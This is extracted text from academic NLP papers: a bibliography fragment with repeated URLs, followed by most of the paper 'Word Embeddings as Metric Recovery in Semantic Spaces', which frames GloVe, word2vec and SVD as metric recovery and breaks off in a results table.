https://www.aaai.org/ocs/index.php/AAAI/AAAI15/paper/view/9745/9552 http://proceedings.mlr.press/v32/le14.html http://proceedings.mlr.press/v32/le14.html http://yann.lecun.com/exdb/publis/pdf/lecun-06.pdf http://yann.lecun.com/exdb/publis/pdf/lecun-06.pdf https://aclanthology.coli.uni-saarland.de/papers/Q17-1026/q17-1026 https://aclanthology.coli.uni-saarland.de/papers/Q17-1026/q17-1026 https://aclanthology.coli.uni-saarland.de/papers/D15-1106/d15-1106 https://aclanthology.coli.uni-saarland.de/papers/D15-1106/d15-1106 https://aclanthology.info/papers/D15-1166/d15-1166 https://aclanthology.info/papers/D15-1166/d15-1166 Proceedings of the 2015 Conference on Empir- ical Methods in Natural Language Processing, pages 1412–1421, Lisbon, Portugal. Thomas Mensink, Jakob Verbeek, Florent Per- ronnin, and Gabriela Csurka. 2012. Metric learning for large scale image classification: Generalizing to new classes at near-zero cost. In Computer Vision – ECCV 2012, pages 488– 501, Berlin, Heidelberg. Springer Berlin Hei- delberg. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S Corrado, and Jeff Dean. 2013. Distributed representations of words and phrases and their compositionality. In C. J. C. Burges, L. Bottou, M. Welling, Z. Ghahramani, and K. Q. Wein- berger, editors, Advances in Neural Information Processing Systems 26, pages 3111–3119. Cur- ran Associates, Inc. Frederic Morin and Yoshua Bengio. 2005. Hier- archical probabilistic neural network language model. In Proceedings of the Tenth Interna- tional Workshop on Artificial Intelligence and Statistics, pages 246–252. Khalil Mrini, Nikolaos Pappas, and Andrei Popescu-Belis. 2017. Cross-lingual transfer for news article labeling: Benchmarking statistical and neural models. In Idiap Research Report, Idiap-RR-26-2017. Jinseok Nam, Eneldo Loza Mencía, and Johannes Fürnkranz. 2016. All-in text: Learning docu- ment, label, and word representations jointly. In Proceedings of the 13th AAAI Conference on Artificial Intelligence, AAAI’16, pages 1948– 1954, Phoenix, Arizona. Mohammad Norouzi, Tomas Mikolov, Samy Ben- gio, Yoram Singer, Jonathon Shlens, Andrea Frome, Greg Corrado, and Jeffrey Dean. 2014. Zero-shot learning by convex combination of semantic embeddings. In International Con- ference on Learning Representations, Banff, Canada. Bo Pang and Lillian Lee. 2005. Seeing stars: Ex- ploiting class relationships for sentiment cate- gorization with respect to rating scales. In Pro- ceedings of the 43rd Annual Meeting on As- sociation for Computational Linguistics, pages 115–124, Ann Arbor, Michigan. Nikolaos Pappas, Lesly Miculicich, and James Henderson. 2018. Beyond weight tying: Learn- ing joint input-output embeddings for neural machine translation. In Proceedings of the Third Conference on Machine Translation: Re- search Papers, pages 73–83, Belgium, Brussels. Association for Computational Linguistics. Nikolaos Pappas and Andrei Popescu-Belis. 2017. Multilingual hierarchical attention networks for document classification. In Proceedings of the Eighth International Joint Conference on Natu- ral Language Processing (Volume 1: Long Pa- pers), pages 1015–1025. Alexander M. Rush, Sumit Chopra, and Jason Weston. 2015. A neural attention model for abstractive sentence summarization. In Pro- ceedings of the 2015 Conference on Empiri- cal Methods in Natural Language Processing, pages 379–389, Lisbon, Portugal. Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016. Neural machine translation of rare words with subword units. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Pa- pers), pages 1715–1725, Berlin, Germany. Lei Shu, Hu Xu, and Bing Liu. 2017. DOC: Deep open classification of text documents. In Pro- ceedings of the 2017 Conference on Empiri- cal Methods in Natural Language Processing, pages 2911–2916, Copenhagen, Denmark. As- sociation for Computational Linguistics. Richard Socher, Milind Ganjoo, Christopher D. Manning, and Andrew Y. Ng. 2013. Zero- shot learning through cross-modal transfer. In Proceedings of the 26th International Confer- ence on Neural Information Processing Sys- tems, NIPS’13, pages 935–943, Lake Tahoe, Nevada. Vivek Srikumar and Christopher D. Manning. 2014. Learning distributed representations for structured output prediction. In Proceedings of the 27th International Conference on Neu- ral Information Processing Systems - Volume 2, NIPS’14, pages 3266–3274, Cambridge, MA, USA. MIT Press. Duyu Tang, Bing Qin, and Ting Liu. 2015. Doc- ument modeling with gated recurrent neural https://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality https://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality https://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality https://www.iro.umontreal.ca/~lisa/pointeurs/hierarchical-nnlm-aistats05.pdf https://www.iro.umontreal.ca/~lisa/pointeurs/hierarchical-nnlm-aistats05.pdf https://www.iro.umontreal.ca/~lisa/pointeurs/hierarchical-nnlm-aistats05.pdf https://publidiap.idiap.ch/index.php/publications/show/3642 https://publidiap.idiap.ch/index.php/publications/show/3642 https://publidiap.idiap.ch/index.php/publications/show/3642 https://www.aaai.org/ocs/index.php/AAAI/AAAI16/paper/view/12058 https://www.aaai.org/ocs/index.php/AAAI/AAAI16/paper/view/12058 https://arxiv.org/abs/1312.5650 https://arxiv.org/abs/1312.5650 https://aclanthology.coli.uni-saarland.de/papers/P05-1015/p05-1015 https://aclanthology.coli.uni-saarland.de/papers/P05-1015/p05-1015 https://aclanthology.coli.uni-saarland.de/papers/P05-1015/p05-1015 http://www.aclweb.org/anthology/W18-6308 http://www.aclweb.org/anthology/W18-6308 http://www.aclweb.org/anthology/W18-6308 http://aclweb.org/anthology/I17-1102 http://aclweb.org/anthology/I17-1102 https://aclanthology.coli.uni-saarland.de/papers/D15-1044/d15-1044 https://aclanthology.coli.uni-saarland.de/papers/D15-1044/d15-1044 https://aclanthology.coli.uni-saarland.de/papers/P16-1162/p16-1162 https://aclanthology.coli.uni-saarland.de/papers/P16-1162/p16-1162 https://www.aclweb.org/anthology/D17-1314 https://www.aclweb.org/anthology/D17-1314 https://papers.nips.cc/paper/5027-zero-shot-learning-through-cross-modal-transfer https://papers.nips.cc/paper/5027-zero-shot-learning-through-cross-modal-transfer http://dl.acm.org/citation.cfm?id=2969033.2969191 http://dl.acm.org/citation.cfm?id=2969033.2969191 https://doi.org/10.18653/v1/D15-1167 https://doi.org/10.18653/v1/D15-1167 network for sentiment classification. In Pro- ceedings of the 2015 Conference on Empiri- cal Methods in Natural Language Processing, pages 1422–1432, Lisbon, Portugal. Associa- tion for Computational Linguistics. Guoyin Wang, Chunyuan Li, Wenlin Wang, Yizhe Zhang, Dinghan Shen, Xinyuan Zhang, Ricardo Henao, and Lawrence Carin. 2018. Joint em- bedding of words and labels for text classifica- tion. In Proceedings of the 56th Annual Meet- ing of the Association for Computational Lin- guistics (Volume 1: Long Papers), pages 2321– 2331. Association for Computational Linguis- tics. Jason Weston, Samy Bengio, and Nicolas Usunier. 2010. Large scale image annotation: Learn- ing to rank with joint word-image embeddings. Mach. Learn., 81(1):21–35. Jason Weston, Samy Bengio, and Nicolas Usunier. 2011. WSABIE: Scaling up to large vocab- ulary image annotation. In Proceedings of the Twenty-Second International Joint Confer- ence on Artificial Intelligence (Volume 3), pages 2764–2770, Barcelona, Spain. Zichao Yang, Diyi Yang, Chris Dyer, Xiaodong He, Alex Smola, and Eduard Hovy. 2016. Hier- archical attention networks for document clas- sification. In Proceedings of the 2016 Confer- ence of the North American Chapter of the As- sociation for Computational Linguistics: Hu- man Language Technologies, pages 1480–1489, San Diego, California. Majid Yazdani and James Henderson. 2015. A model of zero-shot learning of spoken language understanding. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, pages 244–249, Lisbon, Portugal. Chih-Kuan Yeh, Wei-Chieh Wu, Wei-Jen Ko, and Yu-Chiang Frank Wang. 2018. Learning deep latent spaces for multi-label classification. In In Proceedings of the 32nd AAAI Conference on Artificial Intelligence, New Orleans, USA. Xiang Zhang, Junbo Zhao, and Yann LeCun. 2015. Character-level convolutional networks for text classification. In Advances in Neural Information Processing Systems 28, pages 649– 657, Montreal, Canada. Yang Zhang, Boqing Gong, and Mubarak Shah. 2016. Fast zero-shot image tagging. In Pro- ceedings of the IEEE Conference on Computer Vision and Pattern Recognition, Las Vegas, USA. https://doi.org/10.18653/v1/D15-1167 http://aclweb.org/anthology/P18-1216 http://aclweb.org/anthology/P18-1216 http://aclweb.org/anthology/P18-1216 https://doi.org/10.1007/s10994-010-5198-3 https://doi.org/10.1007/s10994-010-5198-3 https://ai.google/research/pubs/pub37180 https://ai.google/research/pubs/pub37180 https://aclanthology.coli.uni-saarland.de/papers/N16-1174/n16-1174 https://aclanthology.coli.uni-saarland.de/papers/N16-1174/n16-1174 https://aclanthology.coli.uni-saarland.de/papers/N16-1174/n16-1174 https://aclanthology.coli.uni-saarland.de/papers/D15-1027/d15-1027 https://aclanthology.coli.uni-saarland.de/papers/D15-1027/d15-1027 https://aclanthology.coli.uni-saarland.de/papers/D15-1027/d15-1027 https://arxiv.org/abs/1707.00418 https://arxiv.org/abs/1707.00418 http://papers.nips.cc/paper/5782-character-level-convolutional-networks-for-text-classification.html http://papers.nips.cc/paper/5782-character-level-convolutional-networks-for-text-classification.html https://arxiv.org/abs/1605.09759 work_ms7apx6u4vd7vjvtuih7h6vqx4 ---- Word Embeddings as Metric Recovery in Semantic Spaces Tatsunori B. Hashimoto, David Alvarez-Melis and Tommi S. Jaakkola CSAIL, Massachusetts Institute of Technology {thashim, davidam, tommi}@csail.mit.edu Abstract Continuous word representations have been remarkably useful across NLP tasks but re- main poorly understood. We ground word embeddings in semantic spaces studied in the cognitive-psychometric literature, taking these spaces as the primary objects to recover. To this end, we relate log co-occurrences of words in large corpora to semantic similarity assessments and show that co-occurrences are indeed consistent with an Euclidean semantic space hypothesis. Framing word embedding as metric recovery of a semantic space uni- fies existing word embedding algorithms, ties them to manifold learning, and demonstrates that existing algorithms are consistent metric recovery methods given co-occurrence counts from random walks. Furthermore, we propose a simple, principled, direct metric recovery al- gorithm that performs on par with the state-of- the-art word embedding and manifold learning methods. Finally, we complement recent fo- cus on analogies by constructing two new in- ductive reasoning datasets—series completion and classification—and demonstrate that word embeddings can be used to solve them as well. 1 Introduction Continuous space models of words, objects, and sig- nals have become ubiquitous tools for learning rich representations of data, from natural language pro- cessing to computer vision. Specifically, there has been particular interest in word embeddings, largely due to their intriguing semantic properties (Mikolov et al., 2013b) and their success as features for down- stream natural language processing tasks, such as named entity recognition (Turian et al., 2010) and parsing (Socher et al., 2013). The empirical success of word embeddings has prompted a parallel body of work that seeks to better understand their properties, associated estimation al- gorithms, and explore possible revisions. Recently, Levy and Goldberg (2014a) showed that linear lin- guistic regularities first observed with word2vec extend to other embedding methods. In particu- lar, explicit representations of words in terms of co- occurrence counts can be used to solve analogies in the same way. In terms of algorithms, Levy and Goldberg (2014b) demonstrated that the global min- imum of the skip-gram method with negative sam- pling of Mikolov et al. (2013b) implicitly factorizes a shifted version of the pointwise mutual informa- tion (PMI) matrix of word-context pairs. Arora et al. (2015) explored links between random walks and word embeddings, relating them to contextual (prob- ability ratio) analogies, under specific (isotropic) as- sumptions about word vectors. In this work, we take semantic spaces stud- ied in the cognitive-psychometric literature as the prototypical objects that word embedding algo- rithms estimate. Semantic spaces are vector spaces over concepts where Euclidean distances between points are assumed to indicate semantic similar- ities. We link such semantic spaces to word co-occurrences through semantic similarity assess- ments, and demonstrate that the observed co- occurrence counts indeed possess statistical proper- ties that are consistent with an underlying Euclidean space where distances are linked to semantic simi- larity. 273 Transactions of the Association for Computational Linguistics, vol. 4, pp. 273–286, 2016. Action Editor: Scott Yih. Submission batch: 12/2015; Revision batch: 3/2016; Published 7/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Analogy A B C I D1 D2 D3 D4 Series Completion A B I D1 D2 D3 D4 Classification A B C I D1 D2 D3 D4 1 Analogy A B C I D1 D2 D3 D4 Series Completion A B I D1 D2 D3 D4 Classification A B C I D1 D2 D3 D4 1 Analogy A B C I D1 D2 D3 D4 Series Completion A B I D1 D2 D3 D4 Classification A B C I D1 D2 D3 D4 1 Figure 1: Inductive reasoning in semantic space proposed in Sternberg and Gardner (1983). A, B, C are given, I is the ideal point and D are the choices. The correct answer is shaded green. Formally, we view word embedding methods as performing metric recovery. This perspective is sig- nificantly different from current approaches. Instead of aiming for representations that exhibit specific se- mantic properties or that perform well at a particu- lar task, we seek methods that recover the underly- ing metric of the hypothesized semantic space. The clearer foundation afforded by this perspective en- ables us to analyze word embedding algorithms in a principled task-independent fashion. In particu- lar, we ask whether word embedding algorithms are able to recover the metric under specific scenarios. To this end, we unify existing word embedding al- gorithms as statistically consistent metric recovery methods under the theoretical assumption that co- occurrences arise from (metric) random walks over semantic spaces. The new setting also suggests a simple and direct recovery algorithm which we eval- uate and compare against other embedding methods. The main contributions of this work can be sum- marized as follows: • We ground word embeddings in semantic spaces via log co-occurrence counts. We show that PMI (pointwise mutual information) re- lates linearly to human similarity assessments, and that nearest-neighbor statistics (centrality and reciprocity) are consistent with an Eu- clidean space hypothesis (Sections 2 and 3). • In contrast to prior work (Arora et al., 2015), we take metric recovery as the key object of study, unifying existing algorithms as consis- tent metric recovery methods based on co- occurrence counts from simple Markov random walks over graphs and manifolds. This strong link to manifold estimation opens a promis- ing direction for extensions of word embedding methods (Sections and 4 and 5). • We propose and evaluate a new principled di- rect metric recovery algorithm that performs comparably to the existing state of the art on both word embedding and manifold learning tasks, and show that GloVe (Pennington et al., 2014) is closely related to the second-order Taylor expansion of our objective. • We construct and make available two new in- ductive reasoning datasets1—series completion and classification—to extend the evaluation of word representations beyond analogies, and demonstrate that these tasks can be solved with vector operations on word embeddings as well (Examples in Table 1). 2 Word vectors and semantic spaces Most current word embedding algorithms build on the distributional hypothesis (Harris, 1954) where similar contexts imply similar meanings so as to tie co-occurrences of words to their underlying mean- ings. The relationship between semantics and co- occurrences has also been studied in psychomet- rics and cognitive science (Rumelhart and Abraham- son, 1973; Sternberg and Gardner, 1983), often by means of free word association tasks and seman- tic spaces. The semantic spaces, in particular, pro- vide a natural conceptual framework for continu- ous representations of words as vector spaces where semantically related words are close to each other. For example, the observation that word embeddings can solve analogies was already shown by Rumel- hart and Abrahamson (1973) using vector represen- tations of words derived from surveys of pairwise word similarity judgments. A fundamental question regarding vector space models of words is whether an Euclidean vector 1http://web.mit.edu/thashim/www/supplement materials.zip 274 Task Prompt Answer Analogy king:man::queen:? woman Series penny:nickel:dime:? quarter Classification horse:zebra:{deer, dog, fish} deer Table 1: Examples of the three inductive reasoning tasks proposed by Sternberg and Gardner (1983). space is a valid representation of semantic concepts. There is substantial empirical evidence in favor of this hypothesis. For example, Rumelhart and Abra- hamson (1973) showed experimentally that analog- ical problem solving with fictitious words and hu- man mistake rates were consistent with an Euclidean space. Sternberg and Gardner (1983) provided fur- ther evidence supporting this hypothesis, proposing that general inductive reasoning was based upon op- erations in metric embeddings. Using the analogy, series completion and classification tasks shown in Table 1 as testbeds, they proposed that subjects solve these problems by finding the word closest (in se- mantic space) to an ideal point: the vertex of a par- allelogram for analogies, a displacement from the last word in series completion, and the centroid in the case of classification (Figure 1). We use semantic spaces as the prototypical struc- tures that word embedding methods attempt to un- cover, and we investigate the suitability of word co- occurrence counts for doing so. In the next section, we show that co-occurrences from large corpora in- deed relate to semantic similarity assessments, and that the resulting metric is consistent with an Eu- clidean semantic space hypothesis. 3 The semantic space of log co-occurrences Most word embedding algorithms are based on word co-occurrence counts. In order for such meth- ods to uncover an underlying Euclidean semantic space, we must demonstrate that co-occurrences themselves are indeed consistent with some seman- tic space. We must relate co-occurrences to semantic similarity assessments, on one hand, and show that they can be embedded into a Euclidean metric space, on the other. We provide here empirical evidence for both of these premises. We commence by demonstrating in Figure 2 that the pointwise mutual information (Church and Hanks, 1990) evaluated from co-occurrence Figure 2: Normalized log co-occurrence (PMI) linearly correlates with human semantic similarity judgments (MEN survey). counts has a strong linear relationship with seman- tic similarity judgments from survey data (Pearson’s r=0.75).2 However, this suggestive linear relation- ship does not by itself demonstrate that log co- occurrences (with normalization) can be used to de- fine an Euclidean metric space. Earlier psychometric studies have asked whether human semantic similarity evaluations are consis- tent with an Euclidean space. For example, Tver- sky and Hutchinson (1986) investigate whether con- cept representations are consistent with the geomet- ric sampling (GS) model: a generative model in which points are drawn independently from a con- tinuous distribution in an Euclidean space. They use two nearest neighbor statistics to test agreement with this model, and conclude that certain hierarchi- cal vocabularies are not consistent with an Euclidean embedding. Similar results are observed by Griffiths et al. (2007). We extend this embeddability analy- sis to lexical co-occurrences and show that semantic similarity estimates derived from these are mostly consistent with an Euclidean space hypothesis. The first test statistic for the GS model, the cen- trality C, is defined as C = 1 n n∑ i=1 ( n∑ j=1 Nij )2 where Nij = 1 iff i is j’s nearest neighbor. Under the GS model (i.e. when the words are consistent with a Euclidean space representation), C ≤ 2 with high probability as the number of words n →∞ re- gardless of the dimension or the underlying density (Tversky and Hutchinson, 1986). For metrically em- beddable data, typical non-asymptotic values of C 2Normalizing the log co-occurrence with the unigram fre- quency taken to the 3/4th power maximizes the linear correla- tion in Figure 2, explaining this choice of normalization in prior work (Levy and Goldberg, 2014a; Mikolov et al., 2013b). 275 Corpus C Rf Free association 1.51 0.48 Wikipedia corpus 2.21 0.63 Word2vec corpus 2.24 0.73 GloVe corpus 2.66 0.62 Table 2: Semantic similarity data derived from mul- tiple sources show evidence of embeddability range between 1 and 3, while non-embeddable hier- archical structures have C > 10. The second statistic, the reciprocity fraction Rf (Schwarz and Tversky, 1980; Tversky and Hutchin- son, 1986), is defined as Rf = 1 n n∑ i=1 n∑ j=1 NijNji and measures the fraction of words that are their nearest neighbor’s nearest neighbor. Under the GS model, this fraction should be greater than 0.5.3 Table 2 shows the two statistics computed on three popular large corpora and a free word associ- ation dataset (see Section 6 for details). The near- est neighbor calculations are based on PMI. The results show a surprisingly high agreement on all three statistics for all corpora, with C and Rf con- tained in small intervals: C ∈ [2.21, 2.66] and Rf ∈ [0.62, 0.73]. These results are consistent with Euclidean semantic spaces and the GS model in particular. The largest violators of C and Rf are consistent with Tversky’s analysis: the word with the largest centrality in the non-stopword Wikipedia corpus is ‘the’, whose inclusion would increase C to 3.46 compared to 2.21 without it. Tversky’s original analysis of semantic similarities argued that certain words, such as superordinate and function words, could not be embedded. Despite such specific ex- ceptions, we find that for an appropriately normal- ized corpus, the majority of words are consistent with the GS model, and therefore can be represented meaningfully as vectors in Euclidean space. The results of this section are an important step towards justifying the use of word co-occurrence counts as the central object of interest for seman- tic vector representations of words. We have shown 3Both R and C are asymptotically dimension independent because they rely only on the single nearest neighbor. Esti- mating the latent dimensionality requires other measures and assumptions (Kleindessner and von Luxburg, 2015). that they are empirically related to a human notion of semantic similarity and that they are metrically em- beddable, a desirable condition if we expect word vectors derived from them to truly behave as ele- ments of a metric space. This, however, does not yet fully justify their use to derive semantic repre- sentations. The missing piece is to formalize the connection between these co-occurrence counts and some intrinsic notion of semantics, such as the se- mantic spaces described in Section 2. In the next two sections, we establish this connection by fram- ing word embedding algorithms that operate on co- occurrences as metric recovery methods. 4 Semantic spaces and manifolds We take a broader, unified view on metric recov- ery of semantic spaces since the notion of semantic spaces and the associated parallelogram rule for ana- logical reasoning extend naturally to objects other than words. For example, images can be approxi- mately viewed as points in an Euclidean semantic space by representing them in terms of their under- lying degrees of freedom (e.g. orientation, illumina- tion). Thus, questions about the underlying seman- tic spaces and how they can be recovered should be related. The problem of recovering an intrinsic Euclidean coordinate system over objects has been specifically addressed in manifold learning. For example, meth- ods such as Isomap (Tenenbaum et al., 2000) re- constitute an Euclidean space over objects (when possible) based on local comparisons. Intuitively, these methods assume that naive distance metrics such as the L2 distance over pixels in an image may be meaningful only when images are very sim- ilar. Longer distances between objects are evaluated through a series of local comparisons. These longer distances—geodesic distances over the manifold— can be approximated by shortest paths on a neigh- borhood graph. If we view the geodesic distances on the manifold (represented as a graph) as seman- tic distances, then the goal is to isometrically embed these distances into an Euclidean space. Tenenbaum (1998) showed that such isometric embeddings of image manifolds can be used to solve “visual analo- gies” via the parallelogram rule. Typical approaches to manifold learning as dis- 276 cussed above differ from word embedding in terms of how the semantic distances between objects are extracted. Word embeddings approximate semantic distances between words using the negative log co- occurrence counts (Section 3), while manifold learn- ing approximates semantic distances using neigh- borhood graphs built from local comparisons of the original, high-dimensional points. Both views seek to estimate a latent geodesic distance. In order to study the problem of metric recov- ery from co-occurrence counts, and to formalize the connection between word embedding and manifold learning, we introduce a simple random walk model over the underlying objects (e.g. words or images). This toy model permits us to establish clean consis- tency results for recovery algorithms. We emphasize that while the random walk is introduced over the words, it is not intended as a model of language but rather as a tool to understand the recovery problem. 4.1 Random walk model Consider now a simple metric random walk Xt over words where the probability of transitioning from word i to word j is given by P(Xt = j|Xt−1 = i) = h( 1σ||xi −xj|| 2 2) (1) Here ||xi −xj||22 is the Euclidean distance between words in the underlying semantic space to be recov- ered, and h is some unknown, sub-Gaussian func- tion linking semantic similarity to co-occurrence.4 Under this model, the log frequency of occur- rences of word j immediately after word i will be proportional to log(h(||xi −xj||22/σ)) as the corpus size grows large. Here we make the surprising ob- servation that if we consider co-occurrences over a sufficiently large window, the log co-occurrence in- stead converges to −||xi−xj||22/σ, i.e. it directly re- lates to the underlying metric. Intuitively, this result is an analog of the central limit theorem for random walks. Note that, for this reason, we do not need to know the link function h. Formally, given an m-token corpus consisting of sentences generated according to Equation 1 from a 4This toy model ignores the role of syntax and function words, but these factors can be included as long as the moment bounds originally derived in Hashimoto et al. (2015b) remain fulfilled. vocabulary of size n, let Cm,nij (tn) be the number of times word j occurs tn steps after word i in the corpus.5 We can show that there exist unigram nor- malizers am,ni ,b m,n i such that the following holds: Lemma 1. Given a corpus generated by Equation 1 there exists ai and bj such that simultaneously over all i,j: lim m,n→∞ − log(Cm,nij (tn))−a m,n i −b m,n j →||xi−xj|| 2 2. We defer the precise statement and conditions of Lemma 1 to Corollary 6. Conceptually, this lim- iting6 result captures the intuition that while one- step transitions in a sentence may be complex and include non-metric structure expressed in h, co- occurrences over large windows relate directly to the latent semantic metric. For ease of notation, we henceforth omit the corpus and vocabulary size descriptors m,n (using Cij, ai, and bj in place of C m,n ij (tn), a m,n i , and b m,n j ), since in practice the cor- pus is large but fixed. Lemma 1 serves as the basis for establishing con- sistency of recovery for word embedding algorithms (next section). It also allows us to establish a precise link between between manifold learning and word embedding, which we describe in the remainder of this section. 4.2 Connection to manifold learning Let {v1 . . .vn} ∈ RD be points drawn i.i.d. from a density p, where D is the dimension of observed inputs (e.g. number of pixels, in the case of im- ages), and suppose that these points lie on a mani- fold M⊂ RD that is isometrically embeddable into d < D dimensions, where d is the intrinsic dimen- sionality of the data (e.g. coordinates representing illumination or camera angle in the case of images). The problem of manifold learning consists of finding an embedding of v1 . . .vn into Rd that preserves the structure of M by approximately preserving the dis- tances between points along this manifold. In light 5The window-size tn depends on the vocabulary size to en- sure that all word pairs have nonzero co-occurrence counts in the limit of large vocabulary and corpus. For details see the definition of gn in Appendix A. 6In Lemma 1, we take m → ∞ (growing corpus size) to ensure all word pairs appear sufficiently often, and n → ∞ (growing vocabulary) to ensure that every point in the semantic space has a nearby word. 277 of Lemma 1, this problem can be solved with word embedding algorithms in the following way: 1. Construct a neighborhood graph (e.g. connect- ing points within a distance ε) over {v1 . . .vn}. 2. Record the vertex sequence of a simple random walk over these graphs as a sentence, and con- catenate these sequences initialized at different nodes into a corpus. 3. Use a word embedding method on this cor- pus to generate d-dimensional vector represen- tations of the data. Under the conditions of Lemma 1, the negative log co-occurrences over the vertices of the neigh- borhood graph will converge, as n → ∞, to the geodesic distance (squared) over the manifold. In this case we will show that the globally optimal so- lutions of word embedding algorithms recover the low dimensional embedding (Section 5).7 5 Recovering semantic distances with word embeddings We now show that, under the conditions of Lemma 1, three popular word embedding methods can be viewed as doing metric recovery from co-occurrence counts. We use this observation to derive a new, sim- ple word embedding method inspired by Lemma 1. 5.1 Word embeddings as metric recovery GloVe The Global Vectors (GloVe) (Pennington et al., 2014) method for word embedding optimizes the objective function min x̂,ĉ,a,b ∑ i,j f(Cij)(2〈x̂i, ĉj〉 + ai + bj − log(Cij))2 with f(Cij) = min(Cij, 100)3/4. If we rewrite the bias terms as ai = âi −||x̂i||22 and bj = b̂j −||ĉj||22, we obtain the equivalent representation: min x̂,ĉ,â,̂b ∑ i,j f(Cij)(− log(Cij)−||x̂i−ĉj||22+âi+b̂j))2. Together with Lemma 1, we recognize this as a weighted multidimensional scaling (MDS) objective 7This approach of applying random walks and word embed- dings to general graphs has already been shown to be surpris- ingly effective for social networks (Perozzi et al., 2014), and demonstrates that word embeddings serve as a general way to connect metric random walks to embeddings. with weights f(Cij). Splitting the word vector x̂i and context vector ĉi is helpful in practice but not necessary under the assumptions of Lemma 1 since the true embedding x̂i = ĉi = xi/σ and âi, b̂i = 0 is a global minimum whenever dim(x̂) = d. In other words, GloVe can recover the true metric provided that we set d correctly. word2vec The skip-gram model of word2vec approximates a softmax objective: min x̂,ĉ ∑ i,j Cij log ( exp(〈x̂i, ĉj〉)∑n k=1 exp(〈x̂i, ĉk〉) ) . Without loss of generality, we can rewrite the above with a bias term bj by making dim(x̂) = d + 1 and setting one of the dimensions of x̂ to 1. By re- defining the bias b̂j = bj − ||ĉj||22/2, we see that word2vec solves min x̂,ĉ,̂b ∑ i,j Cij log ( exp(−1 2 ||x̂i − ĉj||22 + b̂j)∑n k=1 exp(−12||x̂i − ĉk||22 + b̂k) ) . Since according to Lemma 1 Cij/ ∑n k=1 Cik approaches exp(−‖|xi−xj|| 2 2/σ 2)∑n k=1 exp(−‖|xi−xk||22/σ2) , this is the stochastic neighbor embedding (SNE) (Hinton and Roweis, 2002) objective weighted by ∑n k=1 Cik. The global optimum is achieved by x̂i = ĉi = xi( √ 2/σ) and b̂j = 0 (see Theorem 8). The neg- ative sampling approximation used in practice be- haves much like the SVD approach of Levy and Goldberg (2014b), and by applying the same sta- tionary point analysis as they do, we show that in the absence of a bias term the true embedding is a global minimum under the additional assumption that ||xi||22(2/σ2) = log( ∑ j Cij/ √∑ ij Cij) (Hin- ton and Roweis, 2002). SVD The method of Levy and Goldberg (2014b) uses the log PMI matrix defined in terms of the uni- gram frequency Ci as: Mij = log(Cij)−log(Ci)−log(Cj) + log (∑ j Cj ) and computes the SVD of the shifted and truncated matrix: (Mij + τ)+ where τ is a truncation param- eter to keep Mij finite. Under the limit of Lemma 1, the corpus is sufficiently large that no truncation is necessary (i.e. τ = −min(Mij) < ∞). We will 278 recover the underlying embedding if we additionally assume 1 σ ||xi||22 = log(Ci/ √∑ j Cj) via the law of large numbers since Mij → 〈xi,xj〉 (see Theorem 7). Centering the matrix Mij before obtaining the SVD would relax the norm assumption, resulting ex- actly in classical MDS (Sibson, 1979). 5.2 Metric regression from log co-occurrences We have shown that by simple reparameterizations and use of Lemma 1, existing embedding algo- rithms can be interpreted as consistent metric recov- ery methods. However, the same Lemma suggests a more direct regression method for recovering the la- tent coordinates, which we propose here. This new embedding algorithm serves as a litmus test for our metric recovery paradigm. Lemma 1 describes a log-linear relationship be- tween distance and co-occurrences. The canonical way to fit this relationship would be to use a general- ized linear model, where the co-occurrences follow a negative binomial distribution Cij ∼ NegBin(θ,p), where p = θ/[θ + exp(−1 2 ||xi −xj||22 + ai + bj)]. Under this overdispersed log linear model, E[Cij] = exp(−12||xi −xj|| 2 2 + ai + bj) Var(Cij) = E[Cij]2/θ + E[Cij] Here, the parameter θ controls the contribution of large Cij, and is akin to GloVe’s f(Cij) weight function. Fitting this model is straightforward if we define the log-likelihood in terms of the expected rate λij = exp(−12||xi −xj|| 2 2 + ai + bj) as: LL(x,a,b,θ) = ∑ i,j θ log(θ) −θ log(λij + θ)+ Cij log ( 1 − θ λij +θ ) + log ( Γ(Cij +θ) Γ(θ)Γ(Cij +1) ) To generate word embeddings, we minimize the negative log-likelihood using stochastic gradient de- scent. The implementation mirrors that of GloVe and randomly selects word pairs i,j and attracts or repulses the vectors x̂ and ĉ in order to achieve the relationship in Lemma 1. Implementation details are provided in Appendix C. Relationship to GloVe The overdispersion pa- rameter θ in our metric regression model sheds light on the role of GloVe’s weight function f(Cij). Tak- ing the Taylor expansion of the log-likelihood at log(λij) ≈− log(Cij), we have LL(x,a,b,θ) = ∑ ij kij− Cijθ2(Cij +θ) (uij) 2+o ( (uij) 3 ) , where uij = (log λij − log Cij) and kij does not depend on x. Note the similarity of the sec- ond order term with the GloVe objective. As Cij grows, the weight functions Cijθ 2(Cij +θ) and f(Cij) = max(Cij,xmax) 3/4 converge to θ/2 and xmax re- spectively, down-weighting large co-occurrences. 6 Empirical validation We will now experimentally validate two aspects of our theory: the semantic space hypothesis (Sections 2 and 3), and the correspondence between word em- bedding and manifold learning (Sections 4 and 5). Our goal with this empirical validation is not to find the absolute best method and evaluation metric for word embeddings, which has been studied before (e.g. Levy et al. (2015)). Instead, we provide empir- ical evidence in favor of the semantic space hypoth- esis, and show that our simple algorithm for metric recovery is competitive with the state-of-the-art on both semantic induction tasks and manifold learn- ing. Since metric regression naturally operates over integer co-occurrences, we use co-occurrences over unweighted windows for this and—for fairness—for the other methods (see Appendix C for details). 6.1 Datasets Corpus and training: We used three different corpora for training: a Wikipedia snapshot of 03/2015 (2.4B tokens), the original word2vec cor- pus (Mikolov et al., 2013a) (6.4B tokens), and a combination of Wikipedia with Gigaword5 emulat- ing GloVe’s corpus (Pennington et al., 2014) (5.8B tokens). We preprocessed all corpora by removing punctuation, numbers and lower-casing all the text. The vocabulary was restricted to the 100K most fre- quent words in each corpus. We trained embeddings using four methods: word2vec, GloVe, random- ized SVD,8 and metric regression (referred to as re- gression). Full implementation details are provided in the Appendix. 8We used randomized, rather than full SVD due to the diffi- culty of scaling SVD to this problem size. For performance of full SVD factorizations see Levy et al. (2015). 279 Google Semantic Google Syntactic Google Total SAT Classification Sequence Method L2 Cos L2 Cos L2 Cos L2 Cos L2 Cos L2 Cos Regression 75.5 78.4 70.9 70.8 72.6 73.7 